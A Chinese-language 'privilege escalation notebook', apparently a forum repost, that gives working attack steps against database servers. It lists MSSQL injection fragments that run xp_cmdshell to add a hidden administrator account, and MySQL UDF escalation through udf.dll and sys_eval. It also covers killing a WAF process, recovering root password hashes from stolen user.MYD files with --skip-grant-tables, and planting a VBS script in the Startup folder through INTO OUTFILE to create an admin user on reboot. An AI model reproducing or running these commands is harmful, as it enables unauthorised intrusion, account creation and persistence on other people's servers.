提权笔记本(2)

Mssql一些sql语句:
1.检测与恢复扩展存储
判断xp_cmdshell扩展存储是否存在
and 1=(select count(*) from master.dbo.sysobjects where xtype = ‘x‘ AND name= ‘xp_cmdshell‘)

判断xp_regread扩展存储过程是否存在
and 1=(select count(*) from master.dbo.sysobjects where name=‘xp_regread‘)

恢复
;exec sp_dropextendedproc ‘xp_cmdshell‘
;exec sp_dropextendedproc xp_cmdshell,‘xplog70.dll‘

新建用户
;exec master..xp_cmdshell ‘net user fuchou$ fuchou /add‘
;exec master..xp_cmdshell ‘net localgroup administrators fuchou$ /add‘


【mysql提权/3306提权/3306端口提权/mysql注册表/mysql路径/phpmyadmin提权/phpmyadmin 提权/UDF提权/】
思路:UDF~执行mysql调用cmd_shell组建添加用户,然后捣鼓个vbs到重启那儿!让服务器重启一下,账户就自动加上了!嘻嘻~你懂
还有一个方法就是mof提权。
创建cmdshell的函数有两个。
一个是cmdshell
一个是sys_eval:create function sys_eval returns string soname ‘udf.dll‘
倘若有waf以致执can‘t open啥的可以结束掉waf“ntsd -c q -p PID 1234”后面加他的pid就可以了。

如果存在特殊情况:
提权时,当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时:
本地搭建mysql,先停止本地mysql服务
将下载的user.MYD user.frm user.MYI替换本地文件,然后
cd mysqlbin
mysqld-nt --skip-grant-tables
重新打开一个cmd
mysql -u root
select user,password from mysql.user;



UDF提权;
[前提root权限]原理通过root权限导出udf.dll到系统目录下,可以通过udf.DLL调用cmd执行命令。
导出目录
c:\winnt\udf.dll 2000 [这两个都是mysql ]
c:\windows\udf.dll 2003 [数据库版本为5.0以下的 ]

找root密码,一般存在于config之类的配置文件里,上UDF,然后导出dll,然后提之
可能遇到的问题:1.找不到配置文件,直接马子带的搜索工具,搜一下你就找到
2.UDF导出失败,这个很常见!直接找到其mysql安装目录

Root密码可在mysql目录下的(user.MYD,一般是16位或者40位)该文件中找到,不过是经过加密的.直接用c32打开,头文件就是密码啦.去cmd5解密吧.拿到密码,UDF提权之。。。你懂。
如果密码看不见,或是组合不到40位,就本地安装一个mysql吧, 1、停止mysql服务 2、替换下载下来的3个文件(user.MYI user.MYD user.frm) 3、cmd切换到bin目录下,进入mysql安全模式,cmd命令:mysqld-nt --skip-grant-tables 4、重新打开一个cmd 切换到bin目录下,cmd命令:mysql -u root 版本不同有可能是:mysql -uroot -proot 5、最后查询一下就出来了select user,password from mysql.user;

mysql注册表的位置:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MySQL\ //在此可以看到mysql的安装位置

以下是mysql执行语句调用cmd_shell提权
mysql执行命令提权(账号:fuchou$ 密码:fuchou!@#)
mysql>create table a(cmd text); //表a 字段cmd text文本类型
mysql>insert into a values ("set wshshell=createobject(""wscript.shell"")");
mysql>insert into a values ("a=wshshell.run(""cmd.exe /c net user fuchou$ fuchou!@# /add"")");
mysql>insert into a values ("b=wshshell.run(""cmd.exe /c net localgroupo administrators fuchou$ /add"",0)");
mysql>select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//choukuo.vbs";

然后让服务器重启(ms12010)就好了!
以下是mof提权
1.直接上传mof.php直接执行dos命令提权~
2.mof文件里捣鼓个用户加之[未完~~]
转载请注明本文链接: http://www.mayidui.net/t2293.html
游客
登录后才可以回帖,登录 或者 注册